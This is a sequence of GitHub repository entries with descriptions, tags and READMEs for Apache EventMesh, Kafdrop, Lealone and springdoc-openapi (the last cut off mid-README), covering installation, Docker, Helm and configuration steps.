[hotcoffie](https://github.com/hotcoffie) [xiaomu](https://github.com/nikmu) [TristingChen](https://github.com/TristingChen) [chenparty](https://github.com/chenparty) [Hotleave](https://github.com/hotleave) [ydwxb](https://github.com/ydwxb) [ydpd](https://github.com/ydpd) [szy833](https://github.com/szy833) [ydwxb](https://github.com/ydwxb) [Albertzhu666](https://github.com/Albertzhu666) [mk1990](https://github.com/mk1990) [SaltFish001](https://github.com/SaltFish001) 同时感谢JetBrains对开源项目的支持,本项目使用IntelliJ IDEA开发与调试: ![JetBrains](https://resources.jetbrains.com/storage/products/company/brand/logos/IntelliJ_IDEA_icon.svg?_ga=2.143694769.529214288.1712023294-439039083.1711422571&_gl=1*102dv9n*_ga*NDM5MDM5MDgzLjE3MTE0MjI1NzE.*_ga_9J976DJZ68*MTcxMjEyNjg4NC45LjEuMTcxMjEyNzc2My4zMy4wLjA.)
0
apache/eventmesh
EventMesh is a new generation serverless event middleware for building distributed event-driven applications.
cloud-native cqrs esb event-connector event-driven event-gateway event-governance event-mesh event-sourcing event-streaming hacktoberfest message-bus microservice multi-runtime pubsub serverless serverless-workflow
<div align="center"> <br /><br /> <img src="resources/logo.png" width="256"> <br /> [![CI status](https://img.shields.io/github/actions/workflow/status/apache/eventmesh/ci.yml?logo=github&style=for-the-badge)](https://github.com/apache/eventmesh/actions/workflows/ci.yml) [![CodeCov](https://img.shields.io/codecov/c/gh/apache/eventmesh/master?logo=codecov&style=for-the-badge)](https://codecov.io/gh/apache/eventmesh) [![Code Quality: Java](https://img.shields.io/lgtm/grade/java/g/apache/eventmesh.svg?logo=lgtm&logoWidth=18&style=for-the-badge)](https://lgtm.com/projects/g/apache/eventmesh/context:java) [![Total Alerts](https://img.shields.io/lgtm/alerts/g/apache/eventmesh.svg?logo=lgtm&logoWidth=18&style=for-the-badge)](https://lgtm.com/projects/g/apache/eventmesh/alerts/) [![License](https://img.shields.io/github/license/apache/eventmesh?style=for-the-badge)](https://www.apache.org/licenses/LICENSE-2.0.html) [![GitHub Release](https://img.shields.io/github/v/release/apache/eventmesh?style=for-the-badge)](https://github.com/apache/eventmesh/releases) [![Slack Status](https://img.shields.io/badge/slack-join_chat-blue.svg?logo=slack&style=for-the-badge)](https://join.slack.com/t/the-asf/shared_invite/zt-1y375qcox-UW1898e4kZE_pqrNsrBM2g) [📦 Documentation](https://eventmesh.apache.org/docs/introduction) | [📔 Examples](https://github.com/apache/eventmesh/tree/master/eventmesh-examples) | [⚙️ Roadmap](https://eventmesh.apache.org/docs/roadmap) | [🌐 简体中文](README.zh-CN.md) </div> # Apache EventMesh **Apache EventMesh** is a new generation serverless event middleware for building distributed [event-driven](https://en.wikipedia.org/wiki/Event-driven_architecture) applications. ### EventMesh Architecture ![EventMesh Architecture](resources/eventmesh-architecture-4.png) ### EventMesh Dashboard ![EventMesh Dashboard](resources/dashboard.png) ## Features Apache EventMesh has a vast amount of features to help users achieve their goals. Let us share with you some of the key features EventMesh has to offer: - Built around the [CloudEvents](https://cloudevents.io) specification. - Rapidty extendsible interconnector layer [connectors](https://github.com/apache/eventmesh/tree/master/eventmesh-connectors) using [openConnect](https://github.com/apache/eventmesh/tree/master/eventmesh-openconnect) such as the source or sink of Saas, CloudService, and Database etc. - Rapidty extendsible storage layer such as [Apache RocketMQ](https://rocketmq.apache.org), [Apache Kafka](https://kafka.apache.org), [Apache Pulsar](https://pulsar.apache.org), [RabbitMQ](https://rabbitmq.com), [Redis](https://redis.io). - Rapidty extendsible meta such as [Consul](https://consulproject.org/en/), [Nacos](https://nacos.io), [ETCD](https://etcd.io) and [Zookeeper](https://zookeeper.apache.org/). - Guaranteed at-least-once delivery. - Deliver events between multiple EventMesh deployments. - Event schema management by catalog service. - Powerful event orchestration by [Serverless workflow](https://serverlessworkflow.io/) engine. - Powerful event filtering and transformation. - Rapid, seamless scalability. - Easy Function develop and framework integration. ## Roadmap Please go to the [roadmap](https://eventmesh.apache.org/docs/roadmap) to get the release history and new features of Apache EventMesh. ## Subprojects - [EventMesh-site](https://github.com/apache/eventmesh-site): Apache official website resources for EventMesh. - [EventMesh-workflow](https://github.com/apache/eventmesh-workflow): Serverless workflow runtime for event Orchestration on EventMesh. - [EventMesh-dashboard](https://github.com/apache/eventmesh-dashboard): Operation and maintenance console of EventMesh. - [EventMesh-catalog](https://github.com/apache/eventmesh-catalog): Catalog service for event schema management using AsyncAPI. - [EventMesh-go](https://github.com/apache/eventmesh-go): A go implementation for EventMesh runtime. ## Quick start This section of the guide will show you the steps to deploy EventMesh from [Local](#run-eventmesh-runtime-locally), [Docker](#run-eventmesh-runtime-in-docker), [K8s](#run-eventmesh-runtime-in-kubernetes). This section guides the launch of EventMesh according to the default configuration, if you need more detailed EventMesh deployment steps, please visit the [EventMesh official document](https://eventmesh.apache.org/docs/introduction). ### Deployment Event Store > EventMesh supports [multiple Event Stores](https://eventmesh.apache.org/docs/roadmap#event-store-implementation-status), the default storage mode is `standalone`, and does not rely on other event stores as layers. ### Run EventMesh Runtime locally #### 1. Download EventMesh Download the latest version of the Binary Distribution from the [EventMesh Download](https://eventmesh.apache.org/download/) page and extract it: ```shell wget https://dlcdn.apache.org/eventmesh/1.10.0/apache-eventmesh-1.10.0-bin.tar.gz tar -xvzf apache-eventmesh-1.10.0-bin.tar.gz cd apache-eventmesh-1.10.0 ``` #### 2. Run EventMesh Execute the `start.sh` script to start the EventMesh Runtime server. ```shell bash bin/start.sh ``` View the output log: ```shell tail -n 50 -f logs/eventmesh.out ``` When the log output shows server `state:RUNNING`, it means EventMesh Runtime has started successfully. You can stop the run with the following command: ```shell bash bin/stop.sh ``` When the script prints `shutdown server ok!`, it means EventMesh Runtime has stopped. ### Run EventMesh Runtime in Docker #### 1. Pull EventMesh Image Use the following command line to download the latest version of [EventMesh](https://hub.docker.com/r/apache/eventmesh): ```shell sudo docker pull apache/eventmesh:latest ``` #### 2. Run and Manage EventMesh Container Use the following command to start the EventMesh container: ```shell sudo docker run -d --name eventmesh -p 10000:10000 -p 10105:10105 -p 10205:10205 -p 10106:10106 -t apache/eventmesh:latest ``` Enter the container: ```shell sudo docker exec -it eventmesh /bin/bash ``` view the log: ```shell cd logs tail -n 50 -f eventmesh.out ``` ### Run EventMesh Runtime in Kubernetes #### 1. Deploy operator Run the following commands(To delete a deployment, simply replace `deploy` with `undeploy`): ```shell $ cd eventmesh-operator && make deploy ``` Run `kubectl get pods` 、`kubectl get crd | grep eventmesh-operator.eventmesh`to see the status of the deployed eventmesh-operator. ```shell $ kubectl get pods NAME READY STATUS RESTARTS AGE eventmesh-operator-59c59f4f7b-nmmlm 1/1 Running 0 20s $ kubectl get crd | grep eventmesh-operator.eventmesh connectors.eventmesh-operator.eventmesh 2024-01-10T02:40:27Z runtimes.eventmesh-operator.eventmesh 2024-01-10T02:40:27Z ``` #### 2. Deploy EventMesh Runtime Execute the following command to deploy runtime, connector-rocketmq (To delete, simply replace `create` with `delete`): ```shell $ make create ``` Run `kubectl get pods` to see if the deployment was successful. ```shell NAME READY STATUS RESTARTS AGE connector-rocketmq-0 1/1 Running 0 9s eventmesh-operator-59c59f4f7b-nmmlm 1/1 Running 0 3m12s eventmesh-runtime-0-a-0 1/1 Running 0 15s ``` ## Contributing Each contributor has played an important role in promoting the robust development of Apache EventMesh. We sincerely appreciate all contributors who have contributed code and documents. - [Contributing Guideline](https://eventmesh.apache.org/community/contribute/contribute) - [Good First Issues](https://github.com/apache/eventmesh/issues?q=is%3Aopen+is%3Aissue+label%3A%22good+first+issue%22) Here is the [List of Contributors](https://github.com/apache/eventmesh/graphs/contributors), thank you all! :) <a href="https://github.com/apache/eventmesh/graphs/contributors"> <img src="https://contrib.rocks/image?repo=apache/eventmesh&max=2000" /> </a> ## CNCF Landscape <div align="center"> <img src="https://landscape.cncf.io/images/left-logo.svg" width="150"/> <img src="https://landscape.cncf.io/images/right-logo.svg" width="200"/> Apache EventMesh enriches the <a href="https://landscape.cncf.io/serverless?license=apache-license-2-0">CNCF Cloud Native Landscape.</a> </div> ## License Apache EventMesh is licensed under the [Apache License, Version 2.0](http://www.apache.org/licenses/LICENSE-2.0.html). ## Community | WeChat Assistant | WeChat Public Account | Slack | |---------------------------------------------------------|--------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------| | <img src="resources/wechat-assistant.jpg" width="128"/> | <img src="resources/wechat-official.jpg" width="128"/> | [Join Slack Chat](https://join.slack.com/t/the-asf/shared_invite/zt-1y375qcox-UW1898e4kZE_pqrNsrBM2g)(Please open an issue if this link is expired) | Bi-weekly meeting : [#Tencent meeting](https://meeting.tencent.com/dm/wes6Erb9ioVV) : 346-6926-0133 Bi-weekly meeting record : [bilibili](https://space.bilibili.com/1057662180) ### Mailing List | Name | Description | Subscribe | Unsubscribe | Archive | |-------------|---------------------------------------------------------|------------------------------------------------------------|----------------------------------------------------------------|----------------------------------------------------------------------------------| | Users | User discussion | [Subscribe](mailto:users-subscribe@eventmesh.apache.org) | [Unsubscribe](mailto:users-unsubscribe@eventmesh.apache.org) | [Mail Archives](https://lists.apache.org/list.html?users@eventmesh.apache.org) | | Development | Development discussion (Design Documents, Issues, etc.) | [Subscribe](mailto:dev-subscribe@eventmesh.apache.org) | [Unsubscribe](mailto:dev-unsubscribe@eventmesh.apache.org) | [Mail Archives](https://lists.apache.org/list.html?dev@eventmesh.apache.org) | | Commits | Commits to related repositories | [Subscribe](mailto:commits-subscribe@eventmesh.apache.org) | [Unsubscribe](mailto:commits-unsubscribe@eventmesh.apache.org) | [Mail Archives](https://lists.apache.org/list.html?commits@eventmesh.apache.org) | | Issues | Issues or PRs comments and reviews | [Subscribe](mailto:issues-subscribe@eventmesh.apache.org) | [Unsubscribe](mailto:issues-unsubscribe@eventmesh.apache.org) | [Mail Archives](https://lists.apache.org/list.html?issues@eventmesh.apache.org) |
0
obsidiandynamics/kafdrop
Kafka Web UI
consumer-group consumer-producer docker event-sourcing event-streaming kafka kafka-tools kafka-ui kafka-utils kubernetes pub-sub topic web-ui zookeeper
<img src="https://raw.githubusercontent.com/wiki/obsidiandynamics/kafdrop/images/kafdrop-logo.png" width="90px" alt="logo"/> Kafdrop – Kafka Web UI &nbsp; [![Tweet](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?url=https%3A%2F%2Fgithub.com%2Fobsidiandynamics%2Fkafdrop&text=Get%20Kafdrop%20%E2%80%94%20a%20web-based%20UI%20for%20viewing%20%23ApacheKafka%20topics%20and%20browsing%20consumers%20) === [![Price](https://img.shields.io/badge/price-FREE-0098f7.svg)](https://github.com/obsidiandynamics/kafdrop/blob/master/LICENSE) [![Release with mvn](https://github.com/obsidiandynamics/kafdrop/actions/workflows/master.yml/badge.svg)](https://github.com/obsidiandynamics/kafdrop/actions/workflows/master.yml) [![Docker](https://img.shields.io/docker/pulls/obsidiandynamics/kafdrop.svg)](https://hub.docker.com/r/obsidiandynamics/kafdrop) [![Language grade: Java](https://img.shields.io/lgtm/grade/java/g/obsidiandynamics/kafdrop.svg?logo=lgtm&logoWidth=18)](https://lgtm.com/projects/g/obsidiandynamics/kafdrop/context:java) <em>Kafdrop is a web UI for viewing Kafka topics and browsing consumer groups.</em> The tool displays information such as brokers, topics, partitions, consumers, and lets you view messages. ![Overview Screenshot](docs/images/overview.png?raw=true) This project is a reboot of Kafdrop 2.x, dragged kicking and screaming into the world of Java 17+, Kafka 2.x, Helm and Kubernetes. It's a lightweight application that runs on Spring Boot and is dead-easy to configure, supporting SASL and TLS-secured brokers. # Features * **View Kafka brokers** — topic and partition assignments, and controller status * **View topics** — partition count, replication status, and custom configuration * **Browse messages** — JSON, plain text, Avro and Protobuf encoding * **View consumer groups** — per-partition parked offsets, combined and per-partition lag * **Create new topics** * **View ACLs** * **Support for Azure Event Hubs** # Requirements * Java 17 or newer * Kafka (version 0.11.0 or newer) or Azure Event Hubs Optional, additional integration: * Schema Registry # Getting Started You can run the Kafdrop JAR directly, via Docker, or in Kubernetes. ## Running from JAR ```sh java --add-opens=java.base/sun.nio.ch=ALL-UNNAMED \ -jar target/kafdrop-<version>.jar \ --kafka.brokerConnect=<host:port,host:port>,... ``` If unspecified, `kafka.brokerConnect` defaults to `localhost:9092`. **Note:** As of Kafdrop 3.10.0, a ZooKeeper connection is no longer required. All necessary cluster information is retrieved via the Kafka admin API. Open a browser and navigate to [http://localhost:9000](http://localhost:9000). The port can be overridden by adding the following config: ``` --server.port=<port> --management.server.port=<port> ``` Optionally, configure a schema registry connection with: ``` --schemaregistry.connect=http://localhost:8081 ``` and if you also require basic auth for your schema registry connection you should add: ``` --schemaregistry.auth=username:password ``` Finally, a default message and key format (e.g. to deserialize Avro messages or keys) can optionally be configured as follows: ``` --message.format=AVRO --message.keyFormat=DEFAULT ``` Valid format values are `DEFAULT`, `AVRO`, `PROTOBUF`. This can also be configured at the topic level via dropdown when viewing messages. If key format is unspecified, message format will be used for key too. ## Configure Protobuf message type ### Option 1: Using Protobuf Descriptor In case of protobuf message type, the definition of a message could be compiled and transmitted using a descriptor file. Thus, in order for kafdrop to recognize the message, the application will need to access to the descriptor file(s). Kafdrop will allow user to select descriptor and well as specifying name of one of the message type provided by the descriptor at runtime. To configure a folder with protobuf descriptor file(s) (.desc), follow: ``` --protobufdesc.directory=/var/protobuf_desc ``` ### Option 2 : Using Schema Registry In case of no protobuf descriptor file being supplied the implementation will attempt to create the protobuf deserializer using the schema registry instead. ### Defaulting to Protobuf If preferred the message type could be set to default as follows: ``` --message.format=PROTOBUF ``` ## Running with Docker Images are hosted at [hub.docker.com/r/obsidiandynamics/kafdrop](https://hub.docker.com/r/obsidiandynamics/kafdrop). Launch container in background: ```sh docker run -d --rm -p 9000:9000 \ -e KAFKA_BROKERCONNECT=<host:port,host:port> \ -e SERVER_SERVLET_CONTEXTPATH="/" \ obsidiandynamics/kafdrop ``` Launch container with some specific JVM options: ```sh docker run -d --rm -p 9000:9000 \ -e KAFKA_BROKERCONNECT=<host:port,host:port> \ -e JVM_OPTS="-Xms32M -Xmx64M" \ -e SERVER_SERVLET_CONTEXTPATH="/" \ obsidiandynamics/kafdrop ``` Launch container in background with protobuff definitions: ```sh docker run -d --rm -v <path_to_protobuff_descriptor_files>:/var/protobuf_desc -p 9000:9000 \ -e KAFKA_BROKERCONNECT=<host:port,host:port> \ -e SERVER_SERVLET_CONTEXTPATH="/" \ -e CMD_ARGS="--message.format=PROTOBUF --protobufdesc.directory=/var/protobuf_desc" \ obsidiandynamics/kafdrop ``` Then access the web UI at [http://localhost:9000](http://localhost:9000). > **Hey there!** We hope you really like Kafdrop! Please take a moment to [⭐](https://github.com/obsidiandynamics/kafdrop)the repo or [Tweet](https://twitter.com/intent/tweet?url=https%3A%2F%2Fgithub.com%2Fobsidiandynamics%2Fkafdrop&text=Get%20Kafdrop%20%E2%80%94%20a%20web-based%20UI%20for%20viewing%20%23ApacheKafka%20topics%20and%20browsing%20consumers%20) about it. ## Running in Kubernetes (using a Helm Chart) Clone the repository (if necessary): ```sh git clone https://github.com/obsidiandynamics/kafdrop && cd kafdrop ``` Apply the chart: ```sh helm upgrade -i kafdrop chart --set image.tag=3.x.x \ --set kafka.brokerConnect=<host:port,host:port> \ --set server.servlet.contextPath="/" \ --set cmdArgs="--message.format=AVRO --schemaregistry.connect=http://localhost:8080" \ #optional --set jvm.opts="-Xms32M -Xmx64M" ``` For all Helm configuration options, have a peek into [chart/values.yaml](chart/values.yaml). Replace `3.x.x` with the image tag of [obsidiandynamics/kafdrop](https://hub.docker.com/r/obsidiandynamics/kafdrop). Services will be bound on port 9000 by default (node port 30900). **Note:** The context path _must_ begin with a slash. Proxy to the Kubernetes cluster: ```sh kubectl proxy ``` Navigate to [http://localhost:8001/api/v1/namespaces/default/services/http:kafdrop:9000/proxy](http://localhost:8001/api/v1/namespaces/default/services/http:kafdrop:9000/proxy). ### Protobuf support via helm chart: To install with protobuf support, a "facility" option is provided for the deployment, to mount the descriptor files folder, as well as passing the required CMD arguments, via option _mountProtoDesc_. Example: ```sh helm upgrade -i kafdrop chart --set image.tag=3.x.x \ --set kafka.brokerConnect=<host:port,host:port> \ --set server.servlet.contextPath="/" \ --set mountProtoDesc.enabled=true \ --set mountProtoDesc.hostPath="<path/to/desc/folder>" \ --set jvm.opts="-Xms32M -Xmx64M" ``` ## Building After cloning the repository, building is just a matter of running a standard Maven build: ```sh $ mvn clean package ``` The following command will generate a Docker image: ```sh mvn assembly:single docker:build ``` ## Docker Compose There is a `docker-compose.yaml` file that bundles a Kafka/ZooKeeper instance with Kafdrop: ```sh cd docker-compose/kafka-kafdrop docker-compose up ``` # APIs ## JSON endpoints Starting with version 2.0.0, Kafdrop offers a set of Kafka APIs that mirror the existing HTML views. Any existing endpoint can be returned as JSON by simply setting the `Accept: application/json` header. Some endpoints are JSON only: * `/topic`: Returns a list of all topics. ## OpenAPI Specification (OAS) To help document the Kafka APIs, OpenAPI Specification (OAS) has been included. The OpenAPI Specification output is available by default at the following Kafdrop URL: ``` /v3/api-docs ``` It is also possible to access the Swagger UI (the HTML views) from the following URL: ``` /swagger-ui.html ``` This can be overridden with the following configuration: ``` springdoc.api-docs.path=/new/oas/path ``` You can disable OpenAPI Specification output with the following configuration: ``` springdoc.api-docs.enabled=false ``` ## CORS Headers Starting in version 2.0.0, Kafdrop sets CORS headers for all endpoints. You can control the CORS header values with the following configurations: ``` cors.allowOrigins (default is *) cors.allowMethods (default is GET,POST,PUT,DELETE) cors.maxAge (default is 3600) cors.allowCredentials (default is true) cors.allowHeaders (default is Origin,Accept,X-Requested-With,Content-Type,Access-Control-Request-Method,Access-Control-Request-Headers,Authorization) ``` You can also disable CORS entirely with the following configuration: ``` cors.enabled=false ``` ## Topic Configuration By default, you could delete a topic. If you don't want this feature, you could disable it with: ``` --topic.deleteEnabled=false ``` By default, you could create a topic. If you don't want this feature, you could disable it with: ``` --topic.createEnabled=false ``` ## Actuator Health and info endpoints are available at the following path: `/actuator` This can be overridden with the following configuration: ``` management.endpoints.web.base-path=<path> ``` # Guides ## Connecting to a Secure Broker Kafdrop supports TLS (SSL) and SASL connections for [encryption and authentication](http://kafka.apache.org/090/documentation.html#security). This can be configured by providing a combination of the following files (placed into the Kafka root directory): * `kafka.truststore.jks`: specifying the certificate for authenticating brokers, if TLS is enabled. * `kafka.keystore.jks`: specifying the private key to authenticate the client to the broker, if mutual TLS authentication is required. * `kafka.properties`: specifying the necessary configuration, including key/truststore passwords, cipher suites, enabled TLS protocol versions, username/password pairs, etc. When supplying the truststore and/or keystore files, the `ssl.truststore.location` and `ssl.keystore.location` properties will be assigned automatically. ### Using Docker The three files above can be supplied to a Docker instance in base-64-encoded form via environment variables: ```sh docker run -d --rm -p 9000:9000 \ -e KAFKA_BROKERCONNECT=<host:port,host:port> \ -e KAFKA_PROPERTIES="$(cat kafka.properties | base64)" \ -e KAFKA_TRUSTSTORE="$(cat kafka.truststore.jks | base64)" \ # optional -e KAFKA_KEYSTORE="$(cat kafka.keystore.jks | base64)" \ # optional obsidiandynamics/kafdrop ``` Rather than passing `KAFKA_PROPERTIES` as a base64-encoded string, you can also place a pre-populated `KAFKA_PROPERTIES_FILE` into the container: ```sh cat << EOF > kafka.properties security.protocol=SASL_SSL sasl.mechanism=SCRAM-SHA-512 sasl.jaas.config=org.apache.kafka.common.security.scram.ScramLoginModule required username="foo" password="bar" EOF docker run -d --rm -p 9000:9000 \ -v $(pwd)/kafka.properties:/tmp/kafka.properties:ro \ -v $(pwd)/kafka.truststore.jks:/tmp/kafka.truststore.jks:ro \ -v $(pwd)/kafka.keystore.jks:/tmp/kafka.keystore.jks:ro \ -e KAFKA_BROKERCONNECT=<host:port,host:port> \ -e KAFKA_PROPERTIES_FILE=/tmp/kafka.properties \ -e KAFKA_TRUSTSTORE_FILE=/tmp/kafka.truststore.jks \ # optional -e KAFKA_KEYSTORE_FILE=/tmp/kafka.keystore.jks \ # optional obsidiandynamics/kafdrop ``` #### Environment Variables ##### Basic configuration |Name |Description |----------------------------|------------------------------- |`KAFKA_BROKERCONNECT` |Bootstrap list of Kafka host/port pairs. Defaults to `localhost:9092`. |`KAFKA_PROPERTIES` |Additional properties to configure the broker connection (base-64 encoded). |`KAFKA_TRUSTSTORE` |Certificate for broker authentication (base-64 encoded). Required for TLS/SSL. |`KAFKA_KEYSTORE` |Private key for mutual TLS authentication (base-64 encoded). |`SERVER_SERVLET_CONTEXTPATH`|The context path to serve requests on (must end with a `/`). Defaults to `/`. |`SERVER_PORT` |The web server port to listen on. Defaults to `9000`. |`MANAGEMENT_SERVER_PORT` |The Spring Actuator server port to listen on. Defaults to `9000`. |`SCHEMAREGISTRY_CONNECT ` |The endpoint of Schema Registry for Avro or Protobuf message |`SCHEMAREGISTRY_AUTH` |Optional basic auth credentials in the form `username:password`. |`CMD_ARGS` |Command line arguments to Kafdrop, e.g. `--message.format` or `--protobufdesc.directory` or `--server.port`. ##### Advanced configuration | Name |Description |--------------------------|------------------------------- | `JVM_OPTS` |JVM options. E.g.```JVM_OPTS: "-Xms16M -Xmx64M -Xss360K -XX:-TieredCompilation -XX:+UseStringDeduplication -noverify"``` | `JMX_PORT` |Port to use for JMX. No default; if unspecified, JMX will not be exposed. | `HOST` |The hostname to report for the RMI registry (used for JMX). Defaults to `localhost`. | `KAFKA_PROPERTIES_FILE` |Internal location where the Kafka properties file will be written to (if `KAFKA_PROPERTIES` is set). Defaults to `kafka.properties`. | `KAFKA_TRUSTSTORE_FILE` |Internal location where the truststore file will be written to (if `KAFKA_TRUSTSTORE` is set). Defaults to `kafka.truststore.jks`. | `KAFKA_KEYSTORE_FILE` |Internal location where the keystore file will be written to (if `KAFKA_KEYSTORE` is set). Defaults to `kafka.keystore.jks`. | `SSL_ENABLED` | Enabling HTTPS (SSL) for Kafdrop server. Default is `false` | `SSL_KEY_STORE_TYPE` | Type of SSL keystore. Default is `PKCS12` | `SSL_KEY_STORE` | Path to keystore file | `SSL_KEY_STORE_PASSWORD` | Keystore password | `SSL_KEY_ALIAS` | Key alias ### Using Helm Like in the Docker example, supply the files in base-64 form: ```sh helm upgrade -i kafdrop chart --set image.tag=3.x.x \ --set kafka.brokerConnect=<host:port,host:port> \ --set kafka.properties="$(cat kafka.properties | base64)" \ --set kafka.truststore="$(cat kafka.truststore.jks | base64)" \ --set kafka.keystore="$(cat kafka.keystore.jks | base64)" ``` ## Updating the Bootstrap theme Edit the `.scss` files in the `theme` directory, then run `theme/install.sh`. This will overwrite `src/main/resources/static/css/bootstrap.min.css`. Then build as usual. (Requires `npm`.) ## Securing the Kafdrop UI Kafdrop doesn't (yet) natively implement an authentication mechanism to restrict user access. Here's a quick workaround using NGINX using Basic Auth. The instructions below are for macOS and Homebrew. ### Requirements * NGINX: install using `which nginx > /dev/null || brew install nginx` * Apache HTTP utilities: `which htpasswd > /dev/null || brew install httpd` ### Setup Set the admin password (you will be prompted): ```sh htpasswd -c /usr/local/etc/nginx/.htpasswd admin ``` Add a logout page in `/usr/local/opt/nginx/html/401.html`: ```html <!DOCTYPE html> <p>Not authorized. <a href="<!--# echo var="scheme" -->://<!--# echo var="http_host" -->/">Login</a>.</p> ``` Use the following snippet for `/usr/local/etc/nginx/nginx.conf`: ``` worker_processes 4; events { worker_connections 1024; } http { upstream kafdrop { server 127.0.0.1:9000; keepalive 64; } server { listen *:8080; server_name _; access_log /usr/local/var/log/nginx/nginx.access.log; error_log /usr/local/var/log/nginx/nginx.error.log; auth_basic "Restricted Area"; auth_basic_user_file /usr/local/etc/nginx/.htpasswd; location / { proxy_pass http://kafdrop; } location /logout { return 401; } error_page 401 /errors/401.html; location /errors { auth_basic off; ssi on; alias /usr/local/opt/nginx/html; } } } ``` Run NGINX: ```sh nginx ``` Or reload its configuration if already running: ```sh nginx -s reload ``` To logout, browse to [/logout](http://localhost:8080/logout). > **Hey there!** We hope you really like Kafdrop! Please take a moment to [⭐](https://github.com/obsidiandynamics/kafdrop)the repo or [Tweet](https://twitter.com/intent/tweet?url=https%3A%2F%2Fgithub.com%2Fobsidiandynamics%2Fkafdrop&text=Get%20Kafdrop%20%E2%80%94%20a%20web-based%20UI%20for%20viewing%20%23ApacheKafka%20topics%20and%20browsing%20consumers%20) about it. # Contributing Guidelines See [here](CONTRIBUTING.md). ## Release workflow To cut an official release, these are the steps: 1. Commit a new version on master that has the `-SNAPSHOT` suffix stripped (see `pom.xml`). Once the commit is merged, the CI will treat it as a release build, and will end up publishing more artifacts than the regular (non-release/snapshot) build. One of those will be a dockerhub push to the specific version and "latest" tags. (The regular build doesn't update "latest"). 2. You can then edit the release description in GitHub to describe what went into the release. 3. After the release goes through successfully, you need to prepare the repo for the next version, which requires committing the next snapshot version on master again. So we should increment the minor version and add again the `-SNAPSHOT` suffix.
0
lealone/Lealone
比 MySQL 和 MongoDB 快10倍的 OLTP 关系数据库和文档数据库
acid async database lealone microservice newsql oltp orm rdbms replication sharding sql
### Lealone 是什么 * 是一个高性能的面向 OLTP 场景的关系数据库 * 也是一个兼容 MongoDB 的高性能文档数据库 * 同时还高度兼容 MySQL 和 PostgreSQL 的协议和 SQL 语法 ### Lealone 有哪些特性 ##### 高亮特性 * 并发写性能极其炸裂 * 全链路异步化,使用少量线程就能处理大量并发 * 可暂停的、渐进式的 SQL 引擎 * 基于 SQL 优先级的抢占式调度,慢查询不会长期霸占 CPU * 创建 JDBC 连接非常快速,占用资源少,不再需要 JDBC 连接池 * 插件化存储引擎架构,内置 AOSE 引擎,采用新颖的异步化 B-Tree * 插件化事务引擎架构,事务处理逻辑与存储分离,内置 AOTE 引擎 * 支持 Page 级别的行列混合存储,对于有很多字段的表,只读少量字段时能大量节约内存 * 支持通过 CREATE SERVICE 语句创建可托管的后端服务 * 只需要一个不到 2M 的 jar 包就能运行,不需要安装 ##### 普通特性 * 支持索引、视图、Join、子查询、触发器、自定义函数、Order By、Group By、聚合 ##### 云服务版 * 支持高性能分布式事务、支持强一致性复制、支持全局快照隔离 * 支持自动化分片 (Sharding),用户不需要关心任何分片的规则,没有热点,能够进行范围查询 * 支持混合运行模式,包括4种模式: 嵌入式、Client/Server 模式、复制模式、Sharding 模式 * 支持不停机快速手动或自动转换运行模式: Client/Server 模式 -> 复制模式 -> Sharding 模式 ### Lealone 文档 * [快速入门](https://github.com/lealone/Lealone-Docs/blob/master/应用文档/Lealone数据库快速入门.md) * [文档首页](https://github.com/lealone/Lealone-Docs) ### Lealone 插件 * 兼容 MongoDB、MySQL、PostgreSQL 的插件 * [插件首页](https://github.com/lealone-plugins) ### Lealone 微服务框架 * 非常新颖的基于数据库技术实现的微服务框架,开发分布式微服务应用跟开发单体应用一样简单 * [微服务框架文档](https://github.com/lealone/Lealone-Docs/blob/master/%E5%BA%94%E7%94%A8%E6%96%87%E6%A1%A3/%E5%BE%AE%E6%9C%8D%E5%8A%A1%E5%92%8CORM%E6%A1%86%E6%9E%B6%E6%96%87%E6%A1%A3.md#lealone-%E5%BE%AE%E6%9C%8D%E5%8A%A1%E6%A1%86%E6%9E%B6) ### Lealone ORM 框架 * 超简洁的类型安全的 ORM 框架,不需要配置文件和注解 * [ORM 框架文档](https://github.com/lealone/Lealone-Docs/blob/master/%E5%BA%94%E7%94%A8%E6%96%87%E6%A1%A3/%E5%BE%AE%E6%9C%8D%E5%8A%A1%E5%92%8CORM%E6%A1%86%E6%9E%B6%E6%96%87%E6%A1%A3.md#lealone-orm-%E6%A1%86%E6%9E%B6) ### Lealone 名字的由来 * Lealone 发音 ['li:ləʊn] 这是我新造的英文单词, <br> 灵感来自于办公桌上那些叫绿萝的室内植物,一直想做个项目以它命名。 <br> 绿萝的拼音是 lv luo,与 Lealone 英文发音有点相同,<br> Lealone 是 lea + lone 的组合,反过来念更有意思哦。:) ### Lealone 历史 * 2012年从 [H2 数据库 ](http://www.h2database.com/html/main.html)的代码开始 * [Lealone 的过去现在将来](https://github.com/codefollower/My-Blog/issues/16) ### [Lealone License](https://github.com/lealone/Lealone/blob/master/LICENSE.md)
0
springdoc/springdoc-openapi
Library for OpenAPI 3 with spring-boot
java json-format kotlin oauth2 openapi openapi-spec openapi-specification openapi3 rest-api spring spring-boot spring-data-rest spring-hateoas spring-security spring-webflux springdoc-openapi swagger swagger-documentation swagger-ui yaml-format
![Octocat](https://springdoc.org/img/banner-logo.svg) [![Build Status](https://ci-cd.springdoc.org:8443/buildStatus/icon?job=springdoc-openapi-starter-IC)](https://ci-cd.springdoc.org:8443/view/springdoc-openapi/job/springdoc-openapi-starter-IC/) [![Quality Gate](https://sonarcloud.io/api/project_badges/measure?project=springdoc_springdoc-openapi&metric=alert_status)](https://sonarcloud.io/dashboard?id=springdoc_springdoc-openapi) [![Known Vulnerabilities](https://snyk.io/test/github/springdoc/springdoc-openapi.git/badge.svg)](https://snyk.io/test/github/springdoc/springdoc-openapi.git) [![Stack Exchange questions](https://img.shields.io/stackexchange/stackoverflow/t/springdoc)](https://stackoverflow.com/questions/tagged/springdoc?tab=Votes) IMPORTANT: ``springdoc-openapi v1.8.0`` is the latest Open Source release supporting Spring Boot 2.x and 1.x. An extended support for [*springdoc-openapi v1*](https://springdoc.org/v1) project is now available for organizations that need support beyond 2023. For more details, feel free to reach out: [sales@springdoc.org](mailto:sales@springdoc.org) ``springdoc-openapi`` is on [Open Collective](https://opencollective.com/springdoc). If you ❤️ this project consider becoming a [sponsor](https://github.com/sponsors/springdoc). This project is sponsored by <p align="center"> <a href="https://opensource.mercedes-benz.com/" target="_blank"> <img src="https://springdoc.org/img/mercedes-benz.png" height="10%" width="10%" /> </a> &nbsp;&nbsp; <a href="https://www.dm-jobs.com/dmTECH/?locale=de_DE&wt_mc=.display.github.sponsoring.logo" target="_blank"> <img 